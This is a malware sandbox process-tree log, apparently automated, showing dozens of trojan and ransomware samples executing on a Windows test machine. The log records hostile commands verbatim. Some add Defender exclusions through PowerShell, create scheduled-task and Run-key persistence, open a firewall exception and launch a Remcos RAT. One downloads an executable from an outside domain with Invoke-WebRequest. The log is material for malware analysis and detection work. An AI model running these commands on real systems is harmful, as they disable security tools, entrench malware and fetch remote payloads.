C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-853e30fa7446501349d78fee928d90a7ad0c2746a01c723e50384c3abd108bd7.exe"C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-853e30fa7446501349d78fee928d90a7ad0c2746a01c723e50384c3abd108bd7.exe"5⤵PID:2912
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-853e30fa7446501349d78fee928d90a7ad0c2746a01c723e50384c3abd108bd7.exe"C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-853e30fa7446501349d78fee928d90a7ad0c2746a01c723e50384c3abd108bd7.exe"6⤵PID:7116
-
-
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-864dc421ddda3032938a5f1753ebc4d24c6250cd201204c4024012fe2b8a460a.exeHEUR-Trojan.MSIL.Crypt.gen-864dc421ddda3032938a5f1753ebc4d24c6250cd201204c4024012fe2b8a460a.exe3⤵PID:5548
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://vpn.nic.in/4⤵PID:5784
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe2e7846f8,0x7ffe2e784708,0x7ffe2e7847185⤵PID:6032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,3290757932557375854,6358082009558289205,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:25⤵PID:4884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,3290757932557375854,6358082009558289205,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:35⤵PID:1800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,3290757932557375854,6358082009558289205,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:85⤵PID:6408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3290757932557375854,6358082009558289205,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:15⤵PID:4052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3290757932557375854,6358082009558289205,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:15⤵PID:5180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,3290757932557375854,6358082009558289205,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3948 /prefetch:25⤵PID:6296
-
-
-
C:\Users\Admin\AppData\Roaming\inithost.exe"C:\Users\Admin\AppData\Roaming\inithost.exe"4⤵PID:9000
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-884bb5e8ab22f630e5865688ec333e9edb9d891ed3da0bd651aba77a998797ea.exeHEUR-Trojan.MSIL.Crypt.gen-884bb5e8ab22f630e5865688ec333e9edb9d891ed3da0bd651aba77a998797ea.exe3⤵PID:5668
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-9a3cccbf3ec54e526e6979adac8e32294a092ad0374ed8254bebbe525c63551a.exeHEUR-Trojan.MSIL.Crypt.gen-9a3cccbf3ec54e526e6979adac8e32294a092ad0374ed8254bebbe525c63551a.exe3⤵PID:6588
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-9c7a473c55639baded58207c9f8441de9fa24b8ad510f9413ab2e2a1f49bd3e9.exeHEUR-Trojan.MSIL.Crypt.gen-9c7a473c55639baded58207c9f8441de9fa24b8ad510f9413ab2e2a1f49bd3e9.exe3⤵PID:6996
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-9d82aa079a4a45b25cd5d78983ab333a09ff580eae353d0ad862a39cef434e73.exeHEUR-Trojan.MSIL.Crypt.gen-9d82aa079a4a45b25cd5d78983ab333a09ff580eae353d0ad862a39cef434e73.exe3⤵PID:5764
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-9d82aa079a4a45b25cd5d78983ab333a09ff580eae353d0ad862a39cef434e73.exe"C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-9d82aa079a4a45b25cd5d78983ab333a09ff580eae353d0ad862a39cef434e73.exe"4⤵PID:8444
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-9d82aa079a4a45b25cd5d78983ab333a09ff580eae353d0ad862a39cef434e73.exe"C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-9d82aa079a4a45b25cd5d78983ab333a09ff580eae353d0ad862a39cef434e73.exe"4⤵PID:9104
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "5⤵PID:2788
-
C:\Windows\SysWOW64\PING.EXEPING 127.0.0.1 -n 26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5884
-
-
C:\Users\Admin\AppData\Roaming\remcos\remcos.exe"C:\Users\Admin\AppData\Roaming\remcos\remcos.exe"6⤵PID:8980
-
C:\Users\Admin\AppData\Roaming\remcos\remcos.exe"C:\Users\Admin\AppData\Roaming\remcos\remcos.exe"7⤵PID:8236
-
-
C:\Users\Admin\AppData\Roaming\remcos\remcos.exe"C:\Users\Admin\AppData\Roaming\remcos\remcos.exe"7⤵PID:7924
-
-
-
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-a076796754aa2c6ca2c0b67e8c2b01c93b35e3685fd2dc70eee78b4e376ef3a5.exeHEUR-Trojan.MSIL.Crypt.gen-a076796754aa2c6ca2c0b67e8c2b01c93b35e3685fd2dc70eee78b4e376ef3a5.exe3⤵PID:5276
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-a232e183eefa4e1ef29488e72889017b06904f19944bee2467451014f1e0b160.exeHEUR-Trojan.MSIL.Crypt.gen-a232e183eefa4e1ef29488e72889017b06904f19944bee2467451014f1e0b160.exe3⤵PID:5672
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-ad9bc3e0d02c1325e40df08a8e4ddcb64dd978a937a342cd5b381ece71d636f5.exeHEUR-Trojan.MSIL.Crypt.gen-ad9bc3e0d02c1325e40df08a8e4ddcb64dd978a937a342cd5b381ece71d636f5.exe3⤵PID:7968
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-b8fbd47afb48aa70b12c55dcf20473eb1a579bad995aed048dfb9ae9619f47a6.exeHEUR-Trojan.MSIL.Crypt.gen-b8fbd47afb48aa70b12c55dcf20473eb1a579bad995aed048dfb9ae9619f47a6.exe3⤵PID:8180
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 9284⤵PID:7408
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-b9cecac02570aecc4fec0f0266fa1fae40790bea5490f33a4b6486bce0cb0928.exeHEUR-Trojan.MSIL.Crypt.gen-b9cecac02570aecc4fec0f0266fa1fae40790bea5490f33a4b6486bce0cb0928.exe3⤵PID:4852
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tKgpOEWUJEo" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE0D1.tmp"4⤵
- Scheduled Task/Job: Scheduled Task
PID:5728
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-b9cecac02570aecc4fec0f0266fa1fae40790bea5490f33a4b6486bce0cb0928.exe"C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-b9cecac02570aecc4fec0f0266fa1fae40790bea5490f33a4b6486bce0cb0928.exe"4⤵PID:2108
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-bbea4124318564eafeac2932025e6d69d75b63efbf84f48a3475fa974a5a7536.exeHEUR-Trojan.MSIL.Crypt.gen-bbea4124318564eafeac2932025e6d69d75b63efbf84f48a3475fa974a5a7536.exe3⤵PID:7748
-
C:\Users\Admin\AppData\Local\Temp\Fortnite-Swapper.exe"C:\Users\Admin\AppData\Local\Temp\Fortnite-Swapper.exe"4⤵PID:8312
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +r +s "C:\Users\Admin\AppData\Local\Temp\Fortnite-Swapper.exe"4⤵
- Views/modifies file attributes
PID:8372
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-c38e9745b52337ad12f5f91f7686664bfe65b819754073dca8e6b13be56c7fff.exeHEUR-Trojan.MSIL.Crypt.gen-c38e9745b52337ad12f5f91f7686664bfe65b819754073dca8e6b13be56c7fff.exe3⤵PID:1668
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-c38e9745b52337ad12f5f91f7686664bfe65b819754073dca8e6b13be56c7fff.exe" "HEUR-Trojan.MSIL.Crypt.gen-c38e9745b52337ad12f5f91f7686664bfe65b819754073dca8e6b13be56c7fff.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:9072
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-c5bf88556a01cc66703fe980986b7b7adade8a711b8651e35c8615cada08af09.exeHEUR-Trojan.MSIL.Crypt.gen-c5bf88556a01cc66703fe980986b7b7adade8a711b8651e35c8615cada08af09.exe3⤵PID:7516
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-c63fb8b3040beb7794837c99146c59e65dcf62ce9caaddf285d92235af6d1114.exeHEUR-Trojan.MSIL.Crypt.gen-c63fb8b3040beb7794837c99146c59e65dcf62ce9caaddf285d92235af6d1114.exe3⤵PID:5844
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-c6fc963f681fea33ddff525a57e0d6d93649d09472ba565c03764e6c7ffc880e.exeHEUR-Trojan.MSIL.Crypt.gen-c6fc963f681fea33ddff525a57e0d6d93649d09472ba565c03764e6c7ffc880e.exe3⤵PID:7840
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-cb325919abd148704b8aaea8952995a3f3cff91b7b3a6aa227db85dbc937f5d9.exeHEUR-Trojan.MSIL.Crypt.gen-cb325919abd148704b8aaea8952995a3f3cff91b7b3a6aa227db85dbc937f5d9.exe3⤵PID:5892
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"4⤵PID:5652
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7885⤵PID:7940
-
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-d44070ddc0abc06317bc80b62b6160c7e20c1e3d130a3be39e0707ecff11b7db.exeHEUR-Trojan.MSIL.Crypt.gen-d44070ddc0abc06317bc80b62b6160c7e20c1e3d130a3be39e0707ecff11b7db.exe3⤵PID:6160
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-dbc6950b090d71c1a274f1fd99fa2d84e720779513f8809a3dc590dde012cc80.exeHEUR-Trojan.MSIL.Crypt.gen-dbc6950b090d71c1a274f1fd99fa2d84e720779513f8809a3dc590dde012cc80.exe3⤵PID:7544
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-eebb78b35724ef9aec1c4c6c45cfcbc6005b9485e5698d58f8bf63d71f776d71.exeHEUR-Trojan.MSIL.Crypt.gen-eebb78b35724ef9aec1c4c6c45cfcbc6005b9485e5698d58f8bf63d71f776d71.exe3⤵PID:4680
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-f2555603e5482f15436a4d522a81533f7195d8382816f3406dd192682f558aa2.exeHEUR-Trojan.MSIL.Crypt.gen-f2555603e5482f15436a4d522a81533f7195d8382816f3406dd192682f558aa2.exe3⤵PID:6388
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.vho-c3d28a8f18730379e9d3a69a095f8c72c75984c07a670971a721f3feb095f910.exeHEUR-Trojan.MSIL.Crypt.vho-c3d28a8f18730379e9d3a69a095f8c72c75984c07a670971a721f3feb095f910.exe3⤵PID:5828
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 9724⤵PID:7840
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Cryptos.gen-4cc0c5e13fb823ef8f3a6fdc5de6818daef1281af0b2ba748d4576932e7b8304.exeHEUR-Trojan.MSIL.Cryptos.gen-4cc0c5e13fb823ef8f3a6fdc5de6818daef1281af0b2ba748d4576932e7b8304.exe3⤵PID:7320
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"4⤵PID:6608
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit5⤵PID:8128
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'6⤵
- Command and Scripting Interpreter: PowerShell
PID:6432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'6⤵
- Command and Scripting Interpreter: PowerShell
PID:7772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'6⤵
- Command and Scripting Interpreter: PowerShell
PID:6524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'6⤵
- Command and Scripting Interpreter: PowerShell
PID:3036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"5⤵PID:8636
-
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"6⤵PID:2232
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit7⤵PID:7540
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'8⤵
- Scheduled Task/Job: Scheduled Task
PID:8728
-
-
-
C:\Windows\system32\services32.exe"C:\Windows\system32\services32.exe"7⤵PID:8124
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit8⤵PID:7272
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'9⤵
- Command and Scripting Interpreter: PowerShell
PID:4256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'9⤵
- Command and Scripting Interpreter: PowerShell
PID:8944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'9⤵
- Command and Scripting Interpreter: PowerShell
PID:1680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'9⤵
- Command and Scripting Interpreter: PowerShell
PID:6672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"8⤵PID:7532
-
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"9⤵PID:6724
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit10⤵PID:6740
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'11⤵
- Scheduled Task/Job: Scheduled Task
PID:1320
-
-
-
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"10⤵PID:8388
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"10⤵PID:9048
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 311⤵PID:4484
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"7⤵PID:3928
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 38⤵PID:8664
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\XVisualStudio.exe"C:\Users\Admin\AppData\Local\Temp\XVisualStudio.exe"4⤵PID:6844
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\00459\ERROR REPORT.txt4⤵PID:8152
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.Win32.Crypt.gen-26b571354db415e9d47b3fa6baa8de915ce3f389579f5a4d0cb151de35909047.exeHEUR-Trojan.Win32.Crypt.gen-26b571354db415e9d47b3fa6baa8de915ce3f389579f5a4d0cb151de35909047.exe3⤵PID:5140
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.Win32.Crypt.gen-fea20391f6f8e1a48694930cc135f2a054df170a2e6c897219df2765183f243e.exeHEUR-Trojan.Win32.Crypt.gen-fea20391f6f8e1a48694930cc135f2a054df170a2e6c897219df2765183f243e.exe3⤵PID:6496
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c test.exe4⤵PID:1556
-
C:\Users\Admin\Desktop\00459\test.exetest.exe5⤵PID:7868
-
C:\Users\Admin\Desktop\00459\test.exetest.exe6⤵PID:6512
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe"7⤵PID:8212
-
-
-
-
-
-
C:\Users\Admin\Desktop\00459\Trojan-Ransom.Win32.Agent.iza-dd4c2252b6db6eae993039e9c0ecb5b0031e75b714c085a459d947bddaa73525.exeTrojan-Ransom.Win32.Agent.iza-dd4c2252b6db6eae993039e9c0ecb5b0031e75b714c085a459d947bddaa73525.exe3⤵PID:3848
-
C:\Users\Admin\Desktop\00459\Trojan-Ransom.Win32.Agent.iza-dd4c2252b6db6eae993039e9c0ecb5b0031e75b714c085a459d947bddaa73525.exeC:\Users\Admin\Desktop\00459\Trojan-Ransom.Win32.Agent.iza-dd4c2252b6db6eae993039e9c0ecb5b0031e75b714c085a459d947bddaa73525.exe /AutoIt3ExecuteScript "C:\Users\Admin\AppData\Local\Temp\delph1.dat"4⤵PID:5292
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C echo. > "C:\Users\Admin\AppData\Roaming\Isass.exe":Zone.Identifier5⤵PID:1112
-
-
C:\Users\Admin\AppData\Roaming\Isass.exeC:\Users\Admin\AppData\Roaming\Isass.exe5⤵PID:8476
-
C:\Users\Admin\AppData\Roaming\Isass.exeC:\Users\Admin\AppData\Roaming\Isass.exe /AutoIt3ExecuteScript "C:\Users\Admin\AppData\Local\Temp\delph1.dat"6⤵PID:8620
-
-
-
-
-
C:\Users\Admin\Desktop\00459\Trojan-Ransom.Win32.Blocker.nbic-3312d383c2cdf4e207c8c7ced609cb2bd3d7f30aec03c0e35f780b73602e5e39.exeTrojan-Ransom.Win32.Blocker.nbic-3312d383c2cdf4e207c8c7ced609cb2bd3d7f30aec03c0e35f780b73602e5e39.exe3⤵PID:5264
-
C:\Users\Admin\Desktop\00459\Trojan-Ransom.Win32.Blocker.nbic-3312d383c2cdf4e207c8c7ced609cb2bd3d7f30aec03c0e35f780b73602e5e39.exeTrojan-Ransom.Win32.Blocker.nbic-3312d383c2cdf4e207c8c7ced609cb2bd3d7f30aec03c0e35f780b73602e5e39.exe4⤵PID:6592
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI52~1\valo.jpg"5⤵PID:5524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows-Security /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Windows Security.exe""5⤵PID:3916
-
C:\Windows\SysWOW64\reg.exereg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows-Security /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Windows Security.exe"6⤵
- Modifies registry key
PID:7680
-
-
-
-
-
C:\Users\Admin\Desktop\00459\Trojan-Ransom.Win32.Blocker.nbvo-75b77800228079a5b6b94166581b2b406f6dca7baf3a9fb163aa0a2d2a89926b.exeTrojan-Ransom.Win32.Blocker.nbvo-75b77800228079a5b6b94166581b2b406f6dca7baf3a9fb163aa0a2d2a89926b.exe3⤵PID:5368
-
C:\Windows\SYSTEM32\cmd.execmd /c miner.bat4⤵PID:6872
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://qmumdjffuiocstjfmdqt.com/test5.exe -OutFile test5.exe5⤵
- Command and Scripting Interpreter: PowerShell
PID:5828
-
-
-
-
C:\Users\Admin\Desktop\00459\Trojan-Ransom.Win32.Blocker.xivy-22daa56c854123c4a1c64ae900ec12322fbcc240fc1733ced464f3bd96598e87.exeTrojan-Ransom.Win32.Blocker.xivy-22daa56c854123c4a1c64ae900ec12322fbcc240fc1733ced464f3bd96598e87.exe3⤵PID:6072
-
C:\Users\Admin\Desktop\00459\Trojan-Ransom.Win32.Blocker.xivy-22daa56c854123c4a1c64ae900ec12322fbcc240fc1733ced464f3bd96598e87.exeTrojan-Ransom.Win32.Blocker.xivy-22daa56c854123c4a1c64ae900ec12322fbcc240fc1733ced464f3bd96598e87.exe4⤵PID:4480
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI60722\EverythingChange.pdf"5⤵PID:2100
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\WindowsRegistryEditKey.exe""5⤵PID:1496
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\WindowsRegistryEditKey.exe"6⤵
- Modifies registry key
PID:6736
-
-
-
-
-
C:\Users\Admin\Desktop\00459\Trojan-Ransom.Win32.Crypmodng.ie-b035f3b3676c6f401e6cda942f5d432c73e2ebe5520356d8193005bd577d4541.exeTrojan-Ransom.Win32.Crypmodng.ie-b035f3b3676c6f401e6cda942f5d432c73e2ebe5520356d8193005bd577d4541.exe3⤵PID:5840
-
-
C:\Users\Admin\Desktop\00459\Trojan-Ransom.Win32.Crypren.aifn-00ae04e9499e961cb7b62de7c05d862282e3a961c571edc174ff526dacae7682.exeTrojan-Ransom.Win32.Crypren.aifn-00ae04e9499e961cb7b62de7c05d862282e3a961c571edc174ff526dacae7682.exe3⤵PID:9040
-
-
C:\Users\Admin\Desktop\00459\Trojan-Ransom.Win32.Cuba.f-21acdace25d774297eeb8e1387189129c37581f7307cef986c8b12054d0dc46b.exeTrojan-Ransom.Win32.Cuba.f-21acdace25d774297eeb8e1387189129c37581f7307cef986c8b12054d0dc46b.exe3⤵PID:8752
-
C:\Windows\SysWOW64\cmd.exe/c del C:\Users\Admin\Desktop\00459\Trojan-Ransom.Win32.Cuba.f-21acdace25d774297eeb8e1387189129c37581f7307cef986c8b12054d0dc46b.exe >> NUL4⤵PID:8336
-
-
-
C:\Users\Admin\Desktop\00459\Trojan-Ransom.Win32.Encoder.njh-8aaf6aa0e8c1bf79078c69ad18ed45a1bc0648e9eba23c54b4dba25e36c66b38.exeTrojan-Ransom.Win32.Encoder.njh-8aaf6aa0e8c1bf79078c69ad18ed45a1bc0648e9eba23c54b4dba25e36c66b38.exe3⤵PID:9160
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5DE5.tmp\5DE6.tmp\5DE7.bat C:\Users\Admin\Desktop\00459\Trojan-Ransom.Win32.Encoder.njh-8aaf6aa0e8c1bf79078c69ad18ed45a1bc0648e9eba23c54b4dba25e36c66b38.exe"4⤵PID:7868
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Documents\1.VBS"5⤵PID:6800
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e967-e325-11ce-bfc1-08002be10318}" /v LowerFilters /t REG_SZ /d xczdf /f5⤵PID:9188
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e96b-e325-11ce-bfc1-08002be10318}" /v LowerFilters /t REG_SZ /d xczdf /f5⤵PID:8956
-
-
-
-
C:\Users\Admin\Desktop\00459\Trojan-Ransom.Win32.Encoder.njt-8e34e8c41ceeaa7460fca262ba373d6f49fbbac768dfc772e50ca2f3291d4227.exeTrojan-Ransom.Win32.Encoder.njt-8e34e8c41ceeaa7460fca262ba373d6f49fbbac768dfc772e50ca2f3291d4227.exe3⤵PID:6496
-
-
